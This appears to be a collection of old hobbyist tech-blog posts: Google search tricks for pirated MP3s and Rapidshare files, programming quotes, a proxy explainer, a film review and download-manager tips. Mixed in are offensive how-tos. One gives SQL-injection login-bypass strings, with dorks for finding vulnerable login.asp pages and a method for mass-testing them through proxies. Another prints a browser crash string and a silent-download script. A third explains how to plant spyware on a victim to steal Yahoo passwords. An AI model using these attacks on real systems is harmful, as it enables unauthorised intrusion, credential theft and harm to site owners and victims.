me n my thoughts

There is always a lot of search queries on Google for free mp3’s. Unfortunately a direct search for free mp3’s always leads to a wild goose chase that will not get you to the source of the mp3’s that you want. What then is the secret behind getting mp3’s on the internet?

Actually it is fairly easy to get hold of mp3’s by searching in site directories. this search with a little modification will also help locate pdf’s photo’s spreadsheets and more.

Let’s start with a easy search. Type into Google the following:

?intitle:index.of? mp3 [artist] [title]

Replace [artist] with the artist/singer/band you’re looking for and [title] with the song title. Just one of them also fine.

As if by magic, a list of mp3’s with your search terms will appear. You can download the file by right clicking on it and then select save as.

As an alternative, you can also use the following query to search MP3 on the web:

“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums [artist] [title]

Same as above, just replace [artist] and [title] with the artist/singer/band name and the song title.

A third search term is as follow:

?inurl:multiply.com/music? [artist] [title]

And a last one that will also work just fine:

-inurl:(htm|html|php) intitle:”index of” +”last modified” +”parent directory” +description +size +(.mp3|.wma) [artist] [title]

Happy hunting

The first 90 percent of the code accounts for the first 90 percent of the development time…The remaining 10 percent of the code accounts for the other 90 percent of the development time.
Tom Cargill

Most of you are familiar with the virtues of a programmer. There are three, of course: laziness, impatience, and hubris.
Larry Wall

Measuring programming progress by lines of code is like measuring aircraft building progress by weight.
Bill Gates

Debugging is twice as hard as writing the code in the first place. Therefore, if you write the code as cleverly as possible, you are, by definition, not smart enough to debug it.
Brian W. Kernighan

Once a new technology starts rolling, if you’re not part of the steamroller, you’re part of the road.
Stewart Brand

In theory, there is no difference between theory and practice. But, in practice, there is.
Jan L. A. van de Snepscheut

The hardest part of design … is keeping features out.
Donald Norman

Before software can be reusable it first has to be usable.
Ralph Johnson

If debugging is the process of removing bugs, then programming must be the process of putting them in.
Edsger Dijkstra

Software and cathedrals are much the same - first we build them, then we pray.
Anonymous Preacher

The goal of Computer Science is to build something that will last at least until we’ve finished building it.
Anonymous Consultant

The software isn’t finished until the last user is dead.
Anonymous Support Group Member

Better train people and risk they leave - than do nothing and risk they stay.
Anonymous Technical Trainer

Programming is 10% science, 20% ingenuity, and 70% getting the ingenuity to work with the science.
Anonymous Scientist

All programmers are playwrights and all computers are lousy actors.
Anonymous Hack Actor

Bad code isn’t bad, its just misunderstood.
Anonymous Code Behaviorist

It is easier to measure something than to understand what you have measured.
Anonymous Analyst

The sooner you get behind in your work, the more time you have to catch up.
Anonymous Scheduler

When a programming language is created that allows programmers to program in simple English, it will be discovered that programmers cannot speak English.
Anonymous Linguist

Benchmarks don’t lie, but liars do benchmarks.
Anonymous Tester

Why do we never have time to do it right, but always have time to do it over?
Anonymous Code Monkey

RapidShare is probably one of the biggest and fastest web hosters world wide. Rapidshare actually originated from rapidshare.de and switched over to rapidshare.com some time ago to give the web host a world wide recognized meaning. Still it lacks some basics features one of which is not providing the ability to search the hosted files.

15 Search Engines To Hunt Rapidshare Files

Rapidshare is a free for all web host where everyone can upload a file of their choice however to download a file you need a link to the rapidshare server where the file is actually hosted. This is good in terms of privacy but what if you want to download software, movies, music or ebooks of your choice and you don’t know the links. That is where these rapidshare search engines do the job for us. Just type in your your keywords and they will hunt down files relating to that keyword hosted on rapidshare.

Here is a complete list of 15 Rapidshare Search Engines. Use them well and have fun

1. Filez
2. RapidFox
3. HellaFiles
4. RapidShared
5. ShareMiner
6. FilesBot
7. RapidOSearch
8. RapidSearchEngine
9. RapidshareLink
10. OneClickFiles
11. SearchShared
12. EatPaperRapidshare
13. FileSearcher
14. MegaDownload
15. RapidshareURL

This will definitely make it easy for you to search rapidshare files instead of using complex Google operators. Enjoy and use them wisely.

How does Proxy Server Works ?

This is the First Question that arises in our mind when we use the Proxy Servers for Surfing the Internet without revealing our Identity to Others. Here all these mindboggling questions are answered with easy to understand examples.

The exchange of information in Internet is made by the “client - server” model. A client sends a request (what files he needs) and a server sends a reply (required files). For close cooperation (full understanding) between a client and a server the client sends additional information about itself: a version and a name of an operating system, configuration of a browser (including its name and version) etc. This information can be necessary for the server in order to know which web-page should be given (open) to the client. There are different variants of web-pages for different configurations of browsers. However, as long as web-pages do not usually depend on browsers, it makes sense to hide this information from the web-server.

What your browser transmits to a web-server:
a name and a version of an operating system
a name and a version of a browser
configuration of a browser (display resolution, color depth, java / javascript support, …)
IP-address of a client
Other information

The most important part of such information (and absolutely needless for a web-server) is information about IP-address. Using your IP it is possible to know about you the following:
a country where you are from
a city
your provider?s name and e-mail
your physical address

Information, transmitted by a client to a server is available (accessible) for a server as environment variables. Every information unit is a value of some variable. If any information unit is not transmitted, then corresponding variable will be empty (its value will be undetermined).

These are some environment variables:

REMOTE_ADDR ? IP address of a client

HTTP_VIA ? if it is not empty, then a proxy is used. Value is an address (or several addresses) of a proxy server, this variable is added by a proxy server itself if you use one.

HTTP_X_FORWARDED_FOR ? if it is not empty, then a proxy is used. Value is a real IP address of a client (your IP), this variable is also added by a proxy server if you use one.

HTTP_ACCEPT_LANGUAGE ? what language is used in browser (what language a page should be displayed in)

HTTP_USER_AGENT ? so called “a user?s agent”. For all browsers this is Mozilla. Furthermore, browser?s name and version (e.g. MSIE 5.5) and an operating system (e.g. Windows 98) is also mentioned here.

HTTP_HOST ? is a web server?s name

This is a small part of environment variables. In fact there are much more of them (DOCUMENT_ROOT, HTTP_ACCEPT_ENCODING, HTTP_CACHE_CONTROL, HTTP_CONNECTION, SERVER_ADDR, SERVER_SOFTWARE, SERVER_PROTOCOL, …). Their quantity can depend on settings of both a server and a client.

These are examples of variable values:

REMOTE_ADDR = 194.85.1.1
HTTP_ACCEPT_LANGUAGE = ru
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP_HOST = www.webserver.ru
HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7)
HTTP_X_FORWARDED_FOR = 194.115.5.5

Anonymity at work in Internet is determined by what environment variables “hide” from a web-server.

If a proxy server is not used, then environment variables look in the following way:

REMOTE_ADDR = your IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined

According to how environment variables “hided” by proxy servers, there are several types of proxies
Transparent Proxies

They do not hide information about your IP address:

REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = your IP

The function of such proxy servers is not the improvement of your anonymity in Internet. Their purpose is information cashing, organization of joint access to Internet of several computers, etc.
Anonymous Proxies

All proxy servers, that hide a client?s IP address in any way are called anonymous proxies

Simple Anonymous Proxies

These proxy servers do not hide a fact that a proxy is used, however they replace your IP with its own:
REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = proxy IP

These proxies are the most widespread among other anonymous proxy servers.

Distorting Proxies

As well as simple anonymous proxy servers these proxies do not hide the fact that a proxy server is used. However a client?s IP address (your IP address) is replaced with another (arbitrary, random) IP:

REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = random IP address
High Anonymity Proxies

These proxy servers are also called “high anonymity proxy”. In contrast to other types of anonymity proxy servers they hide a fact of using a proxy:

REMOTE_ADDR = proxy IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined

That means that values of variables are the same as if proxy is not used, with the exception of one very important thing ? proxy IP is used instead of your IP address.
Summary

Depending on purposes there are transparent and anonymity proxies. However, remember, using proxy servers you hide only your IP from a web-server, but other information (about browser configuration) is accessible!

One of the major problems with SQL is its poor security issues surrounding is the login and url strings. This tutorial is not going to go into detail on why these string work as all these details have been given in my previous article Top 10 Tricks to exploit SQL Server Systems .

First SEARCH the following Keywords in Google or any Search Engine:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from…choose one that is Vulnerable

INJECTION STRINGS: How to use it?

This is the easiest part…very simple

On the login page just enter something like

user:admin (you dont even have to put this.)
pass:’ or 1=1–

or

user:’ or 1=1–
admin:’ or 1=1–

Some sites will have just a password so

password:’ or 1=1–

In fact I have compiled a combo list with strings like this to use on my chosen targets . There are plenty of strings in the list below. There are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin U\P paths.

The one I am interested in are quick access to targets

PROGRAM

i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit of success with a combo list formatted this way. Yesteday I loaded 40 eastern targets with 18 positive hits in a few minutes how long would it take to go through 40 sites cutting and pasting each string

combo example:

admin:’ or a=a–
admin:’ or 1=1–

And so on. You don’t have to be admin and still can do anything you want. The most important part is example:’ or 1=1– this is our basic injection string

Now the only trudge part is finding targets to exploit. So I tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO…G=Google+Search

17,000 possible targets trying various searches spews out plent more

Now using proxy set in my browser I click through interesting targets. Seeing whats what on the site pages if interesting I then cut and paste URL as a possible target. After an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on. In a couple of hours you can build up quite a list because I don’t select all results or spider for log in pages. I then save the list fire up Ares and enter

1) A Proxy list
2) My Target IP list
3) My Combo list
4) Start.

Now I dont want to go into problems with users using Ares..thing is i know it works for me…

Sit back and wait. Any target vulnerable will show up in the hits box. Now when it finds a target it will spew all the strings on that site as vulnerable. You have to go through each one on the site by cutting and pasting the string till you find the right one. But the thing is you know you CAN access the site. Really I need a program that will return the hit with a click on url and ignore false outputs. I am still looking for it. This will saves quite a bit of time going to each site and each string to find its not exploitable.

There you go you should have access to your vulnerable target by now

Another thing you can use the strings in the urls were user=? edit the url to the = part and paste ‘ or 1=1– so it becomes

user=’ or 1=1– just as quick as login process

Combo List

There are lot of other variations of the Injection String which I cannot put on my blog because that is Illegal. If you are interested I can send it to you through Email. Just write in your email address in comment and I will send it to you as early as possible but you need to remain patient it may take 1 or 2 days.

Happy Hunting

Ok, news is old, Google has released a new browser and all the web is blogging about it. But my duties are to talk about security so I’m not going to review Google Chrome’s features but to list the vulnerabilities already found after only 16 hours from the release. (I fear this post will be outdated in few Hours)

Rishi Narang has been the first. A Denial Of Service simple as pie:

Just browse this page and place your mouse over this link (make sure you bookmark this page if you want to read on though):

CRASH ME

Just “evil:%” in the anchor text is capable of crashing all the Chrome tabs (despite all the tabs are separated processes).

Someone has also reported that by entering a very long bookmark may kill the browser. Length has not been given but it’s worth a try.

If your Chrome is still alive you may want to try entering

about@:

in the location bar.

Good thing is that the browser doesn’t need Administrator rights to run.

Matt Cutt from his blog has stated that the chapter 11 of Eula will be updated. Yes the chapter about you giving all the rights to Google:

a perpetual, irrevocable, worldwide, royalty-free, and non-exclusive license to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content which you submit, post or display on or through, the Services.

I’m worried about the enthusiastic reviews I see online.
Google brand was enough to push an unfinished product up to make it 1% of the User-Agent’s used on its very first day.
The risk is high, fuzzers are still crunching…

Update:

Another Bug found.
<> document.write(’< src="”http://www.example.com/hello.exe”" frameborder="”0″" width="”0″" height="”0″">’); < / script >

This script should (I haven’t tested it yet, will do it later) trigger a silent download on the client machine.

You can read this review in the new issue of Southern Exposure Magazine:

Comic book movies have been on a roller-coaster for the last ten years. “X-Men” was just ok, “X2” was good, “X-Men: The Last Stand” was forgettable. “Spider-Man” was decent, “Spider-Man 2” was fantastic, “Spider-Man 3” was average. “Superman Returns” was visually stimulating but narratively crippled. “Hulk” was better than people gave it credit for (haven’t seen the new one), “Hellboy” was great, “Hellboy II” was fun but not as good as the first, “300” was a two-hour music video, “Iron Man” was wonderful, “V For Vendetta” was better than expected, “Sin City” was nice to look at but gave me a stomach ache, and I hear “Daredevil”, “Fantastic Four”, “Catwoman”, and “The Punisher” aren’t worth my time.

So what about “Batman Begins”? Well, if you ask me, I think it’s towards the top of the list, easily one of the best comic book movies of all time. Director Christopher Nolan took a campy concept and turned it into an epic gothic drama that made you believe a grown man might just put on tights and fight crime (given the appropriate motivation).

But now “The Dark Knight” comes along and not only surpasses the first film, but manages to rise above every other comic book movie I can think of. I’ve been racking my brain and I just can’t come up with another that compares in terms of action, characters, narrative structure, and expectations. This is a truly satisfying movie.

Be warned though; the title is appropriate. This is one dark affair. Heath Ledger’s Joker is one of the most frightening movie villains in quite some time and Harvey Dent’s transformation into Two-Face is quite disturbing as well (just because Wal Mart carries Batman action figures doesn’t mean you should take your kids to this one). But for fans of the first film, you certainly won’t be disappointed here.

As I mentioned, Ledger (who is a shoe-in for a posthumous Oscar) is truly chilling. Forget the Joker you know, the one who wants to take over the world. Ledger’s Joker just wants to watch the world burn. A genuine anarchist, this skinny freak creates chaos not in the name of a particular creed, but for the sake of chaos itself. From the first scene, we know the clown in the purple suit isn’t one to mess with. And he proves to be a bona fide threat to Christian Bale’s Batman, who has been shunned by the city he strives to protect.

Unlike many films in the genre, “The Dark Knight” manages to dig deep into the human condition, dealing with authentic emotions such as loneliness and despair, and conflicting ideologies such as choice vs. chance and chaos vs. order. Like the first film, “The Dark Knight” makes it clear that it is our choices that define us.

This isn’t the best comic book movie of the year. “The Dark Knight” just swept away the competition to become the best comic book movie of all time.

It is the easiest way to hack anyone's Yahoo ID's Password.

Follow these steps to hack the Yahoo ID

1. U have to make a server {spyware} given ur email id.

2. Send the server to the victim's computer anyhow.

3. When he will open it he cant realize that it was a spyware because after opening it, it will be deleted automatically.

4. After open this file, when he will go to login int his yahoo id his password and id will be send to ur given yahoo email id .

5. U can also disable his OS's many features .

There are three types of software by which u can make your own spyware {server]
U can download anyone and use it.

Files:

1. Y-Jacked
2. SH-Yahoo pass sender.
3. Yahoo Hack.

When someone says Google, I think at least 60%-70% of people reply that it's a "Search Engine". Do you know that Google has so much thing going on that we don't even know it exist? Google has the ability to search for images, news, blogs, music, video, maps, products, answers, notebook, linux, apple, movies, definitions and the list goes on...

One thing I don't understand is why when we visit Google's URL (www.google.com), we only see a very simple and clean search page instead of a full featured page like Yahoo? At least now it's much better with a navigation bar where it shows Web, Images, Video, News, Maps, Gmail and more but it's still NOT complete.


Here's a quote taken from Don Norman's "The Truth About Google's Simplicity".

Why are Yahoo! and MSN such complex-looking places? Because their systems are easier to use. Not because they are complex, but because they simplify the life of their users by letting them see their choices on the home page: news, alternative searches, other items of interest. Yahoo! even has an excellent personalization page, so you can choose what you wish to see on that first page.

Take another careful look at Google's front page. Want a map? You have to click once to be offered the choice, then a second additional time to get to the map page. Want to use Google Scholar to check references? Um, well, is that "Advanced Search" or "more." What about their newly announced blog search? Why is Google maps separate from Google Earth? (Oh, those were purchased from different companies. Yes, but why should I, the user, care about the history of Google's acquisitions?)

Anyway, continue reading to check out the list of free and hidden services offered by google in ONE page.

Simply Google has created a page that includes every Google hidden feature.

Chris McEvoy created the original Simply Google but the latest updated version is at the link below. It has more links compared to the original version.

If your web browser's start page is Google.com, you might want to change it to Simply Google because it's more complete than the original and simple Google.com page.

[ Visit Simply Google ]

Universal Share Downloader (USDownloader), also called RapidShare downloader or MyTempDir downloader is actually not a crack or hack program. Instead, Universal Share Downloader is a download manager for automated download a list of files from most popular free uploaders or free unlimited upload files hosting servers such as RapidShare, MegaUpload, YouSendIt, FileFactory and etc.

Normally, if you’re not premium member or paid member or upgraded member of the free unlimited or one-click file hosting, web space and file delivery service, the service will has some limitations when you try to download the files from the server, such as no concurrent parallel download, so you have to download one file after another file has finished downloading. Beside, you’re also limited to certain download bandwidth limit based on time and IP address, download time delay (reserve “download ticket” system and no instant download start) and slower download speed.

AllFiles, Audiofind, Badongo, BestSharing, Come2Store, Datenko, DepositFiles, EasySharing, FileDepartment, FileFactory, FileHD, FileSpace, GetFileBiz, HemenPaylas, HyperUpload, iFolder, MegaShares, MegaUpload, MyTempDir, Quickdump, Rapidfile.fr, RapidShare, RapidUpload, RecFile, SaveFile, Sendmefile, SexUploader, ShareAm, SimpleUpload, Slil, SpbLand, StoreandServe, SupaShare, TurboShare, TurboUpload, UniversalVideo, Upfile, Upload2, Uploading, UploadPort, UploadSend, WebFile, WebFileHost, YourFile, YourFileHost, YourFileLink, YouSendIt and zShare

Note: For proxy servers list, you can download a software called GeoWhere and use GeoWhere to search for available proxy servers on the Internet, and put all the found proxies into a text file. You should use only anonymous proxy, as transparent proxy will reveal your IP address too. Alternatively, several websites has a long list of open public proxy servers that can be used by the USDownloader such as Proxy.6te.net, Proxy.org. Proxy List even allows you to download list of proxy servers in a text file format (remember to download only anonymous or elite proxy by searching for the type before downloading).

Best of all, Universal Share Downloader is a freeware, and no installation needed. Just download the Universal Share Downloader v 1.3.4 Beta 8 zip file , extract it and run the USDownloader.exe. The few limitation of Universal Share Downloader include unable to download normal download links (it works on those file sharing/hosting services only), and it itself yet to support parallel, concurrent and multi-threaded downloading in current (1.3.3) version (to enable it now, you have to launch multiple USDownloader.exe)

Homepage (in Russian): Universal Share Downloader